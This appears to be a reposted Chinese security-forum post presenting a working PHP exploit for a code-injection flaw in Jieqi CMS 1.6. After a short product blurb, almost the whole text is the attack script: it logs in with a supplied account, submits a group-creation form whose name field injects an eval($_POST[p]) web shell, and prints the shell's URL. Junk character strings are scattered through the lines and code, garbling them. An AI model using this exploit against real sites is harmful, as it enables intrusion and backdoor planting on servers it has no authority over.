杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。
( i, D- e; d: M+ m+ e5 A" D
% ]- H& o1 X& o: {6 [: B+ ^9 H. {
3 n/ F9 J4 H# @该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。8 e9 D/ [: w {, s+ W* [. ]
需要有一个能创建圈子的用户。4 d% e4 Q# `3 A* c. N
$ e9 {, z0 \9 k4 l, M<?php# s0 Z3 e6 h% t5 h
. v ~- f* R& g( P# X! Xprint_r('
. r4 i2 x+ e$ ], b) T& O9 y+---------------------------------------------------------------------------+
. i x- o7 R0 ~Jieqi CMS V1.6 PHP Code Injection Exploit* q; W3 O X' h' [3 ^* l
by flyh4t9 {& @# N! y6 V; T
mail: phpsec at hotmail dot com2 T2 F8 K4 b" _ l! {5 W/ g9 K! S
team: http://www.wolvez.org% [ j" V. K6 b0 R8 H
+---------------------------------------------------------------------------+9 C6 c- r% G' q' j/ H, ^3 Y3 e# \) o
'); /**
( ?# L z+ Q# c8 M$ F# O * works regardless of php.ini settings
! y V3 I _4 J1 A" }*/ if ($argc < 5) { print_r(', B; Q3 b0 S- \& t$ U
+---------------------------------------------------------------------------+
) z1 X. B1 |4 X& SUsage: php '.$argv[0].' host path username
% L# L0 r2 u% n% k$ D- V4 q: h- Z% Bhost: target server (ip/hostname)- q* j' F2 r* y+ p0 Q% |4 O+ k/ ^
path: path to jieqicms , L- c! Y6 D" O
uasename: a username who can create group) c0 R# n' s. J% k
Example:0 c$ r0 C+ m$ U# B- [ p
php '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password
$ Y0 j5 J' S5 J& M+ B7 k5 P5 k+---------------------------------------------------------------------------+# f0 ?+ ?6 Z( H0 Q6 Z
'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961! ^4 N. p: ?; K; c3 q; U1 b2 g
Content-Disposition: form-data; name="gname": m! z& W% p( b, V( E; ?( w. D/ `
+ [) d3 T/ O& @8 m
'; $params .="';"; $params .='eval($_POST[p]);//flyh4t/ R; a7 Z1 M' t
-----------------------------232811682799612 E n2 L. F+ t! Z- `
Content-Disposition: form-data; name="gcatid"0 \/ [ p3 h3 l. V& i$ |1 v- p
* b: X! j A/ c! O3 q; \
1/ f$ y6 M, A H3 O# u! T9 Y
-----------------------------23281168279961
' G1 B9 y! M$ X H' M7 iContent-Disposition: form-data; name="gaudit". ^, ~/ ]% J8 @# L% _7 J
- F2 A& W& t. b, p7 P
1# N; ~& T5 G0 R, o
-----------------------------23281168279961
. d6 E; b& r6 c( s) y' kContent-Disposition: form-data; name="gbrief"4 A! i# f y. g0 V
, X9 h6 w! b: ~, E8 M) F
1# s* k# Q" Y: J( v! l) N
-----------------------------23281168279961--+ l1 q6 c/ s, b! V0 K3 Q: o5 P# I; L
'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com- o3 x) W5 A9 G
* C" `% o. _, ]; p! fpreg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url; |